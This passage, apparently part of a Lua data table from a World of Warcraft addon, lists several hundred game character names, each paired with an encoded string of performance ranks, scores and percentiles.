["Magestarz"] = "LT:639/98%SB:803/99%SM:1005/99%",
["Mgwd"] = "ET:671/87%LB:720/98%EM:781/82%",
["Enigmar"] = "LT:790/98%SB:833/99%SM:1009/99%",
["Rogwing"] = "UT:284/37%EB:667/86%RM:286/60%",
["Ycc"] = "ET:673/87%EB:740/93%EM:790/82%",
["Nummymuffins"] = "ET:352/91%EB:724/92%LM:835/97%",
["Kaligo"] = "UT:128/49%EB:711/89%EM:659/91%",
["Dabit"] = "ET:609/81%EB:528/89%LM:933/96%",
["Vampgaze"] = "LT:545/97%EB:683/86%EM:832/86%",
["Bru"] = "ET:692/90%LB:737/98%EM:769/91%",
["Phenomenaut"] = "ET:371/91%LB:755/95%LM:904/95%",
["Kilimoto"] = "LT:746/96%EB:697/88%EM:647/90%",
["Edgeman"] = "ST:770/99%SB:753/99%LM:902/98%",
["Jinzie"] = "ET:667/87%EB:749/94%EM:842/89%",
["Férrum"] = "LT:456/95%LB:646/95%EM:913/93%",
["Cptavocado"] = "ET:704/90%EB:517/88%EM:842/87%",
["Hamcannon"] = "LB:761/95%LM:965/97%",
["Lubolubo"] = "EB:715/90%EM:909/92%",
["Casualchris"] = "ET:608/79%EB:708/89%LM:939/96%",
["Darkymane"] = "ET:285/82%LB:663/96%EM:921/93%",
["Wingw"] = "ET:607/80%EB:718/90%EM:910/93%",
["Irvings"] = "RT:491/65%LB:649/96%EM:775/81%",
["Feminist"] = "ET:625/82%EB:618/94%EM:845/89%",
["Skeetz"] = "ET:342/89%EB:718/90%EM:807/84%",
["Mgnx"] = "RT:445/59%EB:637/83%",
["Wenpoopoo"] = "LT:756/95%LB:643/95%SM:997/99%",
["Homieo"] = "ET:740/94%SB:751/99%SM:1005/99%",
["Babychoda"] = "EB:647/84%EM:835/86%",
["Caesyy"] = "RT:185/63%EB:686/88%RM:653/70%",
["Tengkoraks"] = "LT:507/96%LB:621/95%EM:794/82%",
["Tandytt"] = "ET:633/83%EB:563/91%EM:805/86%",
["Selkis"] = "UT:125/45%EB:745/93%EM:855/88%",
["Plywood"] = "LT:754/96%LB:777/97%LM:836/97%",
["Clarena"] = "ET:737/94%SB:816/99%SM:918/99%",
["Balaam"] = "ST:783/99%SB:833/99%SM:1013/99%",
["Alpìne"] = "LT:755/96%SB:800/99%LM:967/98%",
["Pvesucks"] = "ET:698/89%EB:733/93%LM:961/97%",
["Unclephin"] = "ET:596/78%EB:595/93%EM:885/90%",
["Sköll"] = "ET:561/76%EB:662/85%RM:712/66%",
["Granittee"] = "ET:633/83%EB:710/90%EM:827/86%",
["Kohydra"] = "LT:518/96%EB:710/90%EM:817/84%",
["Furtive"] = "ET:672/87%EB:708/90%EM:901/92%",
["Ianoy"] = "ET:653/85%LB:755/95%EM:771/81%",
["Platedude"] = "ET:641/84%EB:728/92%EM:894/93%",
["Blootstar"] = "RT:557/74%EB:722/91%EM:917/93%",
["Chunks"] = "RT:181/64%SB:817/99%SM:989/99%",
["Noro"] = "LB:756/95%EM:865/89%",
["Cheeder"] = "EB:673/85%EM:864/88%",
["Landrover"] = "UT:74/26%EB:705/89%EM:922/94%",
["Karara"] = "ET:621/79%LB:710/95%EM:789/85%",
["Gumphry"] = "ET:766/93%EB:670/91%EM:829/91%",
["Lane"] = "CT:118/12%EB:647/88%EM:860/91%",
["Droid"] = "ET:793/94%EB:671/90%EM:859/92%",
["Purplecandy"] = "ET:350/84%EB:541/93%EM:739/82%",
["Laverga"] = "CT:74/22%EB:600/84%EM:463/81%",
["Masturshake"] = "RT:206/62%EB:538/77%EM:759/83%",
["Shamkut"] = "RT:428/54%EB:567/78%EM:765/83%",
["Muwahdib"] = "RT:233/71%LB:737/96%LM:933/97%",
["Augustxames"] = "ET:343/84%RB:484/69%EM:599/89%",
["Anduinwryn"] = "UT:158/49%EB:559/78%RM:597/66%",
["Cohqt"] = "RT:434/55%LB:747/97%LM:945/97%",
["Vesik"] = "EB:565/80%EM:805/86%",
["Isuckatheals"] = "RB:424/61%RM:462/55%",
["Sidin"] = "UT:275/34%RB:496/72%RM:614/68%",
["Spazt"] = "EB:569/81%RM:656/72%",
["Youngjin"] = "RT:188/61%LB:718/95%LM:940/97%",
["Hadin"] = "RT:220/64%EB:671/90%EM:890/93%",
["Bjorniboy"] = "RT:223/65%RB:482/70%RM:379/65%",
["Swiftleaf"] = "LB:737/97%EM:762/83%",
["Nitronöx"] = "ET:412/90%RB:497/72%CM:26/0%",
["Xxwing"] = "EB:654/90%RM:638/73%",
["Milami"] = "EB:656/90%EM:878/93%",
["Kokah"] = "ET:284/76%RB:510/74%RM:465/54%",
["Sunsu"] = "ST:859/99%SB:799/99%LM:953/98%",
["Oilyjoe"] = "EB:683/92%LM:944/97%",
["Hbvrr"] = "ET:361/86%EB:399/82%EM:685/78%",
["Trollaltdel"] = "ET:730/88%LB:750/97%LM:920/96%",
["Lareth"] = "EB:394/81%RM:680/74%",
["Tacotruckk"] = "RB:392/55%RM:460/53%",
["Uncas"] = "RT:523/71%EB:679/93%EM:886/93%",
["Holysamuel"] = "EB:591/86%EM:705/84%",
["Padaladin"] = "CT:32/7%EB:558/79%EM:719/81%",
["Pettyshift"] = "LT:507/95%EB:698/94%EM:859/93%",
["Crazypow"] = "UT:95/34%LB:759/98%LM:931/96%",
["Gravicius"] = "LT:555/97%EB:456/87%EM:809/87%",
["Inormity"] = "ET:350/84%EB:466/88%EM:705/77%",
["Chenrizig"] = "ET:650/81%EB:662/90%EM:613/90%",
["Tonispumoni"] = "EB:666/90%EM:741/81%",
["Richhomie"] = "EB:605/84%EM:858/92%",
["Squishtastic"] = "RT:189/58%EB:657/90%EM:891/94%",
["Fajibblets"] = "ET:318/83%EB:683/92%EM:875/92%",
["Bmfk"] = "UT:288/35%EB:457/88%EM:428/78%",
["Astá"] = "ET:564/75%EB:684/93%EM:859/93%",
["Inlandtaipan"] = "ET:349/84%EB:460/87%EM:768/83%",
["Ganfauth"] = "ET:693/86%EB:564/94%EM:839/89%",
["Toadie"] = "LT:609/98%EB:594/82%EM:574/89%",
["Elchemist"] = "LT:633/98%LB:767/98%LM:929/95%",
["Detroitred"] = "ET:429/92%EB:604/84%EM:819/88%",
["Bonjourdaisy"] = "UT:134/43%EB:446/88%EM:744/81%",
["Kòy"] = "CT:134/14%LB:720/95%LM:942/97%",
["Hinagu"] = "LT:747/95%EB:704/90%EM:851/90%",
["Jumungie"] = "ET:685/88%EB:612/78%EM:783/81%",
["Amoonir"] = "RT:517/70%LB:793/98%SM:1052/99%",
["Feelsokayman"] = "ET:735/94%LB:751/97%EM:793/89%",
["Dyps"] = "ET:736/94%LB:598/95%LM:963/97%",
["Jackfrosty"] = "LT:766/97%LB:772/97%LM:943/95%",
["Dabois"] = "ST:702/99%LB:758/97%LM:947/96%",
["Inayaa"] = "LT:768/97%LB:765/96%EM:896/93%",
["Xerosenkio"] = "LT:751/95%SB:828/99%LM:981/98%",
["Pwnsaw"] = "ET:731/94%SB:837/99%LM:987/98%",
["Hotpancakes"] = "ET:742/94%LB:704/97%EM:770/80%",
["Snowflower"] = "ET:664/87%EB:378/76%RM:659/73%",
["Jyuny"] = "ET:678/89%EB:698/92%EM:746/84%",
["Stormsadist"] = "ET:720/92%LB:776/97%EM:932/94%",
["Huanchaoo"] = "LT:756/96%LB:769/97%EM:858/90%",
["Nozo"] = "ET:721/93%LB:771/97%LM:974/98%",
["Batousai"] = "ET:378/92%SB:811/99%LM:994/98%",
["Vandal"] = "ET:338/88%EB:751/94%LM:968/97%",
["Saygoodbye"] = "LT:741/95%SB:735/99%EM:567/88%",
["Krantic"] = "ET:728/93%LB:766/96%LM:955/97%",
["Trazy"] = "LT:744/95%LB:799/98%LM:988/98%",
["Lutos"] = "LT:776/98%LB:769/97%EM:902/94%",
["Vìn"] = "ET:701/90%EB:744/93%EM:898/91%",
["Lanfeer"] = "ET:700/91%EB:674/90%EM:868/91%",
["Daiwanlung"] = "ET:717/92%EB:560/91%EM:907/94%",
["Olberik"] = "ET:684/89%LB:742/98%EM:716/93%",
["Evellyn"] = "ST:769/99%LB:790/98%SM:1011/99%",
["Multiplerats"] = "ET:364/91%EB:721/94%LM:792/97%",
["Dmp"] = "LT:781/98%SB:824/99%LM:965/97%",
["Hillsong"] = "LT:742/95%LB:760/96%EM:903/93%",
["Mfnoluck"] = "ET:670/87%LB:762/95%EM:793/83%",
["Superwq"] = "LT:777/97%EB:730/92%RM:633/69%",
["Wrahhmoo"] = "LT:783/98%SB:803/99%LM:961/98%",
["Flowzero"] = "ST:810/99%SB:800/99%LM:975/98%",
["Kluzctrl"] = "LT:591/98%EB:718/92%EM:830/88%",
["Stick"] = "ET:701/91%EB:723/92%EM:548/90%",
["Kris"] = "ST:796/99%LB:788/98%LM:957/97%",
["Cocoamilk"] = "LT:750/95%EB:745/94%EM:753/79%",
["Karadear"] = "ET:701/91%LB:770/97%EM:806/86%",
["Aioria"] = "LT:751/95%LB:636/97%EM:824/87%",
["Bluecc"] = "ET:664/87%EB:694/87%SM:999/99%",
["Shippie"] = "LT:754/96%SB:730/99%EM:887/92%",
["Dhaddy"] = "RT:523/70%EB:592/78%EM:522/86%",
["Talib"] = "LT:771/97%SB:816/99%SM:1017/99%",
["Ffx"] = "ST:793/99%LB:777/97%EM:916/94%",
["Mageup"] = "ET:641/84%LB:775/97%LM:956/97%",
["Statuz"] = "LT:759/96%EB:700/89%EM:724/79%",
["Kundalina"] = "ET:680/89%LB:768/97%LM:933/95%",
["Susaku"] = "ET:688/89%LB:772/97%LM:950/96%",
["Joebagz"] = "LT:633/98%RB:429/62%CM:160/24%",
["Designer"] = "LT:784/98%SB:797/99%SM:1005/99%",
["Ellwindelm"] = "LT:788/98%SB:800/99%LM:987/98%",
["Wynkyn"] = "LT:447/95%LB:726/95%LM:937/96%",
["Unjstiz"] = "ET:571/76%EB:473/85%RM:288/59%",
["Alphabow"] = "ST:793/99%SB:813/99%SM:1025/99%",
["Youngqi"] = "LT:763/96%LB:772/97%EM:882/90%",
["Nitah"] = "LT:788/98%LB:775/97%LM:928/95%",
["Caloristop"] = "ET:352/89%EB:705/90%EM:876/91%",
["Velociraptor"] = "LT:771/97%LB:763/96%EM:791/84%",
["Fínk"] = "LT:758/96%EB:730/92%UM:414/47%",
["Spidercat"] = "LT:790/98%LB:767/97%EM:868/91%",
["Potatocannon"] = "ET:740/94%LB:764/96%LM:968/97%",
["Oldmeimei"] = "LT:677/95%LB:679/98%LM:944/97%",
["Dãzzy"] = "RT:525/67%EB:525/75%UM:399/46%",
["Lightingmum"] = "RT:500/62%EB:623/86%EM:784/86%",
["Lemen"] = "RT:95/55%RB:310/69%EM:750/82%",
["Darkhunter"] = "ET:701/87%RB:331/73%EM:826/88%",
["Tearward"] = "UT:128/40%RB:530/74%RM:622/69%",
["Frumpis"] = "RT:409/51%EB:609/86%RM:630/70%",
["Malice"] = "ET:717/87%EB:407/83%EM:638/91%",
["Antidarkness"] = "RT:502/64%EB:655/89%EM:784/85%",
["Slickyheals"] = "UT:258/30%EB:624/85%RM:678/74%",
["Asúna"] = "UT:113/38%LB:751/97%EM:751/81%",
["Kaylui"] = "ET:299/79%EB:418/83%EM:858/92%",
["Ceyl"] = "CT:19/22%UB:36/33%UM:210/25%",
["Hypnotist"] = "ET:303/78%UB:315/42%EM:707/78%",
["Evelyn"] = "ET:629/79%EB:611/84%RM:675/74%",
["Zugzugzug"] = "ET:613/76%EB:641/88%EM:858/90%",
["Chonky"] = "UT:109/37%UB:313/42%UM:335/39%",
["Terrabane"] = "ET:678/85%EB:647/88%EM:886/93%",
["Stopstopstop"] = "RT:161/53%RB:524/74%CM:103/11%",
["Rhizotonic"] = "RT:407/51%RB:273/61%UM:234/27%",
["Isaír"] = "UT:375/47%EB:636/87%LM:928/96%",
["Lariat"] = "ET:331/84%EB:564/80%EM:695/77%",
["Bingojones"] = "RT:463/58%EB:545/78%EM:477/81%",
["Billdom"] = "LT:642/98%LB:712/95%LM:893/95%",
["Udairy"] = "ET:305/81%EB:549/94%EM:854/91%",
["Josong"] = "RT:173/53%UB:321/44%RM:593/65%",
["Whillwinz"] = "ET:457/93%RB:430/62%EM:822/87%",
["Noxo"] = "ST:790/99%SB:816/99%SM:1007/99%",
["Crushinpoosy"] = "RT:528/68%EB:600/84%RM:643/71%",
["Badger"] = "UT:362/45%RB:387/52%RM:571/63%",
["Hyl"] = "UT:236/27%EB:603/83%EM:685/75%",
["Entool"] = "ET:316/80%EB:567/80%EM:813/87%",
["Plagiarism"] = "ET:482/94%LB:742/97%LM:763/96%",
["Wimpleton"] = "CT:77/23%RB:323/71%UM:174/45%",
["Tinderela"] = "ET:343/84%RB:307/68%EM:624/91%",
["Viagna"] = "LT:573/97%LB:652/97%EM:899/93%",
["Bashir"] = "ET:468/94%EB:476/89%EM:596/89%",
["Rathalos"] = "RT:494/62%EB:393/80%EM:756/86%",
["Yaka"] = "UT:266/32%RB:488/70%RM:346/61%",
["Cenedra"] = "RT:225/68%RB:355/74%EM:683/77%",
["Goingorrilaz"] = "ET:435/91%EB:562/78%EM:689/76%",
["Stilltrash"] = "ET:679/83%RB:312/71%EM:715/94%",
["Sanglug"] = "RT:224/65%RB:419/59%RM:366/71%",
["Leatheled"] = "RT:525/68%EB:542/77%RM:418/50%",
["Cptpancako"] = "RT:213/66%RB:517/73%RM:564/65%",
["Ventiinii"] = "CT:111/12%EB:446/86%RM:595/66%",
["Baowulfer"] = "RT:224/68%RB:468/66%UM:300/34%",
["Challa"] = "ST:778/99%LB:640/97%LM:849/98%",
["Nokomis"] = "ET:308/82%RB:341/72%RM:558/61%",
["Itsonlyagame"] = "ET:607/78%EB:528/92%EM:686/76%",
["Orannis"] = "ET:395/90%LB:718/95%EM:535/87%",
["Saintluna"] = "CT:67/6%CB:126/13%RM:252/57%",
["Emuk"] = "UT:124/39%RB:417/60%EM:815/89%",
["Betheliana"] = "RT:415/52%EB:677/91%EM:794/85%",
["Darkswan"] = "UB:318/42%UM:417/45%",
["Yihaomu"] = "RT:589/74%EB:543/94%EM:439/78%",
["Cblunts"] = "EB:713/90%EM:905/92%",
["Naxa"] = "LT:771/97%SB:779/99%SM:1042/99%",
["Frosteds"] = "LT:773/98%LB:775/98%LM:943/97%",
["Nao"] = "SB:873/99%SM:1118/99%",
["Nightfiend"] = "LT:615/98%SB:806/99%LM:949/96%",
["Roxalbinoemu"] = "ET:644/84%LB:630/95%EM:732/94%",
["Douma"] = "LT:766/96%SB:778/99%LM:839/96%",
["Lemillion"] = "ET:726/93%EB:696/88%EM:832/88%",
["Scrubnub"] = "ST:834/99%SB:809/99%SM:1028/99%",
["Unlegman"] = "ET:700/90%LB:725/98%LM:795/95%",
["Ggs"] = "ET:569/75%EB:749/94%EM:859/88%",
["Babyorc"] = "UT:299/42%LB:780/97%LM:966/97%",
["Cancer"] = "RT:194/67%SB:801/99%SM:1116/99%",
["Brainunglaus"] = "ST:743/99%SB:751/99%SM:925/99%",
["Tobykeith"] = "ET:650/85%EB:678/86%EM:692/76%",
["Rainbowjazz"] = "LT:518/96%EB:750/94%LM:940/95%",
["Couscous"] = "ET:599/78%EB:697/89%EM:844/87%",
["Brokenshield"] = "LT:512/97%EB:601/93%EM:803/84%",
["Arcticwolf"] = "LT:663/98%SB:760/99%EM:896/91%",
["Dezee"] = "LT:763/97%LB:775/97%EM:881/91%",
["Grimmjoy"] = "ET:531/79%EB:608/86%EM:842/93%",
["Jescob"] = "ET:686/89%LB:662/96%LM:956/97%",
["Drshanks"] = "ET:726/92%EB:747/94%EM:901/92%",
["Batousi"] = "LB:765/96%LM:959/97%",
["Poekin"] = "UT:197/25%EB:674/86%EM:892/92%",
["Dabbers"] = "UT:112/44%EB:705/89%EM:831/86%",
["Doint"] = "SB:809/99%LM:990/98%",
["Ityßity"] = "UT:254/33%EB:695/88%EM:803/84%",
["Nazzakadoo"] = "ET:237/76%EB:697/88%EM:819/85%",
["Disabled"] = "ET:530/79%LB:762/95%EM:914/93%",
["Schmebulock"] = "ET:249/78%EB:675/86%EM:742/80%",
["Mightguydz"] = "RT:237/74%EB:608/94%EM:916/93%",
["Lihai"] = "ET:715/92%LB:704/97%EM:806/90%",
["Dillar"] = "ET:634/83%EB:728/91%LM:944/96%",
["Lilsavagè"] = "ET:685/92%EB:550/93%EM:786/90%",
["Poguy"] = "ET:593/78%EB:739/93%LM:945/96%",
["Mayple"] = "ET:616/81%LB:680/96%EM:661/91%",
["Mirtul"] = "ST:797/99%SB:790/99%LM:932/96%",
["Unyun"] = "ET:628/81%EB:563/91%EM:812/84%",
["Skeenz"] = "EB:688/87%EM:865/91%",
["Thorn"] = "RT:132/50%LB:756/95%LM:945/96%",
["Sbel"] = "ET:247/76%EB:690/88%EM:582/85%",
["Chritsjho"] = "ET:745/94%LB:754/95%LM:933/95%",
["Starset"] = "UT:378/49%EB:685/86%LM:965/97%",
["Gotmilk"] = "ET:581/84%EB:667/89%EM:847/92%",
["Nerfnarf"] = "LT:590/98%EB:520/88%EM:723/77%",
["Inevitable"] = "RT:525/71%EB:693/88%EM:692/92%",
["Riddly"] = "LT:766/97%LB:790/98%SM:1030/99%",
["Buku"] = "RT:469/64%LB:777/97%EM:890/91%",
["Soi"] = "LB:760/95%LM:971/97%",
["Xenodank"] = "LT:768/97%LB:779/97%SM:989/99%",
["Craizy"] = "ET:402/93%EB:688/88%EM:718/92%",
["Bombzor"] = "ST:815/99%SB:736/99%LM:953/98%",
["Swaj"] = "ST:679/99%LB:624/95%EM:842/87%",
["Ztb"] = "LT:750/95%LB:774/97%LM:983/98%",
["Straws"] = "LT:750/95%LB:782/98%SM:908/99%",
["Ixix"] = "ET:723/92%EB:681/86%EM:905/92%",
["Andrusha"] = "ET:560/75%LB:765/96%EM:916/94%",
["Important"] = "ET:373/92%LB:778/97%EM:871/90%",
["Groovy"] = "EB:678/86%LM:996/98%",
["Monbogo"] = "LT:775/97%LB:779/98%LM:978/98%",
["Midzy"] = "ET:300/86%LB:765/96%EM:901/92%",
["Cryom"] = "ST:797/99%SB:820/99%SM:1012/99%",
["Woly"] = "UT:85/31%EB:710/90%EM:749/93%",
["Thismistax"] = "LT:742/95%EB:705/92%EM:786/90%",
["Robm"] = "ET:741/94%LB:779/98%EM:869/94%",
["Stinzy"] = "LT:495/96%EB:691/88%EM:931/94%",
["Chitonu"] = "ET:335/89%EB:517/88%EM:806/84%",
["Broms"] = "ST:793/99%SB:826/99%LM:834/97%",
["Destroy"] = "ET:619/82%EB:726/92%EM:894/92%",
["Wargonn"] = "LT:769/97%SB:801/99%LM:968/98%",
["Seriman"] = "UT:9/37%LB:612/97%EM:874/94%",
["Busriderx"] = "RB:497/72%EM:872/93%",
["Tyzam"] = "ET:454/93%EB:707/93%EM:913/94%",
["Holymango"] = "EB:567/78%RM:643/71%",
["Inc"] = "ET:712/88%EB:433/85%EM:887/94%",
["Dolgann"] = "RT:188/57%RB:468/67%RM:528/62%",
["Airiona"] = "CT:118/13%UB:349/49%CM:124/14%",
["Yunye"] = "UT:90/28%EB:635/87%EM:876/93%",
["Hølywatergun"] = "LT:489/95%EB:625/86%EM:815/88%",
["Shamanju"] = "RT:174/53%EB:700/92%EM:866/90%",
["Rhianñon"] = "RT:201/64%EB:653/90%EM:519/86%",
["Vastvoodoo"] = "LT:582/97%EB:649/87%EM:895/93%",
["Ijuba"] = "LT:814/96%EB:637/89%RM:502/59%",
["Gsm"] = "UT:111/35%EB:581/82%RM:543/60%",
["Faviolah"] = "UT:355/44%EB:562/77%EM:791/85%",
["Sebela"] = "EB:610/84%EM:724/81%",
["Yenomroftuls"] = "RB:455/65%RM:511/60%",
["Haadogei"] = "ET:304/81%EB:529/92%EM:719/79%",
["Slag"] = "LB:732/95%LM:948/97%",
["Azzim"] = "UT:112/35%EB:628/88%EM:870/93%",
["Billy"] = "LT:756/98%EB:668/90%EM:906/94%",
["Withoutfear"] = "LT:572/97%EB:638/88%EM:690/93%",
["Muladhara"] = "ET:479/94%LB:650/98%LM:910/96%",
["Deletiurs"] = "ET:445/93%EB:621/87%EM:800/87%",
["Cyllaz"] = "EB:562/79%EM:659/75%",
["Bathu"] = "UT:231/28%EB:614/87%RM:468/51%",
["Shordie"] = "RT:420/53%EB:634/88%EM:746/83%",
["Cydefx"] = "ET:678/85%LB:724/96%EM:873/93%",
["Ellievyra"] = "RB:489/71%UM:415/49%",
["Silverblade"] = "UT:364/46%EB:621/87%EM:789/85%",
["Tokenz"] = "CT:111/11%EB:620/84%EM:874/91%",
["Orangemobs"] = "EB:667/91%EM:793/86%",
["Sevr"] = "LT:591/97%EB:681/91%EM:855/90%",
["Rolfe"] = "UT:297/36%RB:315/70%EM:715/82%",
["Notbroch"] = "EB:594/84%RM:529/62%",
["Cyclothymia"] = "ET:269/78%LB:552/95%EM:371/76%",
["Leghavinaz"] = "LT:496/96%EB:677/90%EM:809/86%",
["Lolfrostshok"] = "UT:42/46%RB:507/73%RM:476/65%",
["Taríc"] = "EB:606/84%EM:739/84%",
["Dütch"] = "LB:727/96%EM:871/93%",
["Stankcoolow"] = "ET:636/79%EB:669/90%EM:799/87%",
["Vincënt"] = "RT:550/74%LB:754/97%LM:909/95%",
["Monkeybread"] = "EB:597/84%LM:926/97%",
["Saltazar"] = "LT:536/97%LB:734/96%SM:988/99%",
["Coldbox"] = "RT:229/70%RB:475/68%RM:639/73%",
["Nerwen"] = "EB:619/85%EM:773/84%",
["Viceroy"] = "UT:234/27%EB:614/86%EM:700/79%",
["Dyscz"] = "ET:662/83%LB:591/96%EM:717/82%",
["Wanari"] = "CT:5/8%RB:420/61%RM:462/54%",
["Trollbeast"] = "RT:182/56%EB:393/81%RM:646/71%",
["Brolie"] = "RT:464/60%EB:689/92%LM:738/95%",
["Evillive"] = "ET:642/83%EB:698/94%EM:774/82%",
["Kimbell"] = "RT:160/54%EB:628/86%EM:855/90%",
["Mizhiyaboo"] = "EB:407/83%EM:773/84%",
["Though"] = "ET:587/77%EB:546/79%EM:691/76%",
["Anuo"] = "LT:821/96%EB:677/92%EM:689/79%",
["Golgi"] = "ET:652/86%LB:717/95%EM:915/94%",
["Zombiephobia"] = "ST:783/99%EB:722/94%EM:914/94%",
["Icedyougood"] = "ET:728/94%EB:736/93%EM:912/94%",
["Denelorn"] = "LT:770/97%LB:789/98%LM:985/98%",
["Thatwarrior"] = "ST:822/99%LB:780/98%EM:836/91%",
["Yomrrage"] = "ET:710/91%EB:739/93%EM:863/91%",
["Jeffie"] = "ST:809/99%LB:789/98%LM:931/96%",
["Charaa"] = "LT:756/96%SB:760/99%EM:875/92%",
["Browneyepen"] = "LT:475/96%LB:757/95%LM:954/97%",
["Dirv"] = "ST:704/99%EB:518/92%LM:940/96%",
["Hannam"] = "ST:804/99%SB:827/99%LM:972/98%",
["Smoothbrain"] = "LT:772/97%LB:780/97%LM:965/97%",
["Aggies"] = "ET:677/89%EB:404/82%EM:719/83%",
["Aleiro"] = "ET:710/92%EB:658/89%EM:872/94%",
["Dexmarksman"] = "LT:763/96%LB:775/97%SM:981/99%",
["Zeikeai"] = "ET:720/92%EB:688/87%EM:912/93%",
["Remyzzy"] = "ST:659/99%LB:771/98%EM:841/93%",
["Kolos"] = "LT:770/98%SB:799/99%LM:974/98%",
["Lostthunder"] = "ET:694/89%EB:723/91%EM:841/86%",
["Valfore"] = "ET:720/93%SB:810/99%LM:951/96%",
["Dubpace"] = "LT:786/98%SB:788/99%EM:909/94%",
["Fandre"] = "ST:795/99%SB:802/99%SM:989/99%",
["Kobito"] = "ET:597/80%RB:272/61%",
["Veryniceguy"] = "ET:604/79%SB:812/99%LM:978/98%",
["Ellendrina"] = "ET:617/82%EB:686/88%EM:836/88%",
["Seeks"] = "ET:425/94%LB:774/97%EM:877/91%",
["Noidej"] = "ET:730/93%LB:738/98%LM:966/98%",
["Bigtiann"] = "ET:735/94%LB:752/96%LM:944/97%",
["Coconutboy"] = "ET:567/75%EB:617/81%EM:736/80%",
["Spaz"] = "ET:380/92%LB:769/97%LM:962/97%",
["Ellwynna"] = "ET:720/92%EB:548/90%EM:848/88%",
["Riperate"] = "ET:722/92%EB:746/94%LM:932/95%",
["Aerryk"] = "LT:744/95%LB:780/97%LM:949/96%",
["Whitedragon"] = "ET:281/83%LB:772/97%LM:983/98%",
["Frozentheon"] = "ET:693/90%EB:619/86%EM:770/88%",
["Blondibock"] = "LT:501/96%LB:580/95%EM:919/94%",
["Brined"] = "LT:750/95%EB:751/94%EM:879/90%",
["Swears"] = "LT:753/98%EB:717/94%EM:785/89%",
["Yunnie"] = "ST:799/99%LB:628/95%EM:852/89%",
["Withrain"] = "LT:748/95%EB:460/87%EM:777/83%",
["Jarbito"] = "ST:772/99%LB:736/96%LM:974/98%",
["Ruthlssob"] = "ET:738/94%LB:598/95%LM:796/97%",
["Frexi"] = "ET:696/89%LB:769/97%EM:923/94%",
["Scrodo"] = "ST:720/99%SB:814/99%LM:949/98%",
["Swagsalad"] = "ET:635/84%LB:764/96%LM:956/96%",
["Grìff"] = "ST:708/99%LB:741/98%LM:962/97%",
["Smallcoll"] = "ET:702/91%LB:777/97%LM:951/96%",
["Dasmi"] = "LT:775/98%EB:744/94%EM:917/94%",
["Demodian"] = "ST:734/99%LB:769/97%LM:980/98%",
["Meliôdas"] = "ET:666/87%LB:671/96%LM:949/97%",
["Icyinveins"] = "LT:755/96%SB:688/99%LM:843/98%",
["Cruxy"] = "ST:793/99%LB:792/98%LM:960/98%",
["Grumpylock"] = "ET:736/94%LB:783/98%LM:970/98%",
["Coxxynormous"] = "ST:809/99%LB:791/98%LM:984/98%",
["Cbtmaster"] = "LT:741/95%LB:784/98%LM:941/96%",
["Manddy"] = "ET:346/90%EB:544/90%EM:748/81%",
["Mignon"] = "ST:764/99%EB:746/94%EM:911/93%",
["Papabenis"] = "ET:583/77%LB:771/96%LM:975/98%",
["Bootiepirate"] = "ET:671/88%LB:771/98%LM:823/97%",
["Frostnips"] = "ET:727/93%EB:695/92%EM:849/92%",
["Cakebatter"] = "ET:687/89%EB:622/82%EM:843/86%",
["Firefiend"] = "ST:692/99%SB:749/99%SM:897/99%",
["Magidaddy"] = "ET:680/89%LB:783/98%LM:955/97%",
["Blacklisted"] = "LT:751/96%SB:810/99%LM:945/96%",
["Grayfox"] = "LT:789/98%LB:796/98%LM:974/98%",
["Bolky"] = "LT:763/97%LB:795/98%SM:1061/99%",
["Xiaoyyu"] = "ET:685/93%LB:697/95%EM:431/80%",
["Chunniunai"] = "ET:407/91%EB:483/89%EM:423/80%",
["Alderas"] = "UT:137/43%EB:369/77%RM:642/70%",
["Saucybiscuit"] = "CT:98/10%EB:604/84%EM:816/88%",
["Chaohuaxishi"] = "ET:748/91%EB:663/90%EM:901/94%",
["Borganos"] = "CT:138/14%EB:635/87%EM:877/92%",
["Warlogic"] = "UT:259/32%RB:421/57%EM:711/78%",
["Mahrk"] = "ET:278/78%RB:452/64%EM:895/94%",
["Justpeachy"] = "ET:295/78%RB:307/69%EM:398/75%",
["Basically"] = "RT:436/54%EB:419/84%UM:119/38%",
["Brawn"] = "ST:763/99%EB:678/92%LM:966/98%",
["Aviad"] = "CT:130/13%UB:350/48%EM:763/81%",
["Cutemilka"] = "CT:146/16%RB:512/71%EM:681/75%",
["Enjayhowlay"] = "ET:636/82%RB:467/68%RM:537/60%",
["Strai"] = "LT:489/95%EB:515/92%LM:939/96%",
["Treefairy"] = "LT:555/97%EB:461/87%LM:911/95%",
["Tyrantpally"] = "UT:337/42%EB:578/80%EM:838/89%",
["Dtft"] = "RT:529/69%LB:771/98%EM:874/92%",
["Rabiz"] = "RT:197/59%EB:572/79%EM:709/78%",
["Griefigans"] = "UT:39/39%RB:499/69%EM:814/88%",
["Jimmers"] = "RT:393/50%UB:133/34%RM:433/50%",
["Washer"] = "UT:350/44%CB:193/23%RM:473/71%",
["Budgie"] = "RT:436/56%RB:456/66%EM:716/79%",
["Chuffy"] = "UT:328/40%RB:535/74%RM:670/74%",
["Zemfira"] = "CT:96/10%RB:449/64%RM:431/51%",
["Jellohello"] = "CT:177/20%CM:48/3%",
["Reif"] = "UT:125/39%EB:379/79%RM:644/71%",
["Zaael"] = "ET:300/81%EB:561/77%EM:645/92%",
["Lzlz"] = "RT:438/56%EB:454/87%RM:351/71%",
["Crushbolt"] = "ET:589/76%EB:597/84%EM:683/77%",
["Maii"] = "UT:280/37%EB:688/93%EM:744/83%",
["Glw"] = "CT:28/0%EB:644/88%EM:905/94%",
["Stalvay"] = "ET:501/84%EB:606/87%EM:884/93%",
["Pattydaddy"] = "ET:469/93%EB:559/94%EM:752/88%",
["Ninerva"] = "ET:402/90%EB:676/91%RM:667/74%",
["Brycer"] = "ET:301/78%EB:546/93%EM:690/93%",
["Prettylady"] = "ET:289/80%RB:423/60%EM:746/84%",
["Haobahyah"] = "UT:114/36%EB:632/87%RM:605/67%",
["Dallia"] = "UT:111/35%RB:255/60%RM:504/59%",
["Hashj"] = "LT:493/95%LB:726/95%EM:786/85%",
["Blitzosaurus"] = "ET:322/81%RB:502/72%EM:444/79%",
["Cryztal"] = "RT:476/60%EB:460/87%EM:795/89%",
["Sleepywayge"] = "ET:748/91%EB:648/88%EM:865/93%",
["Stormsurge"] = "RT:222/65%EB:662/89%EM:895/93%",
["Alpha"] = "ET:321/83%EB:655/89%EM:787/82%",
["Wifesbf"] = "RT:170/56%EB:487/90%EM:779/87%",
["Jessiemen"] = "RT:159/50%UB:138/33%RM:420/50%",
["Kelotheria"] = "RT:550/71%EB:627/86%EM:693/76%",
["Cheeseboi"] = "RT:394/50%UB:216/28%CM:170/18%",
["Zelashan"] = "ET:272/77%EB:606/83%LM:834/95%",
["Motomoto"] = "RT:171/70%EB:551/78%RM:481/72%",
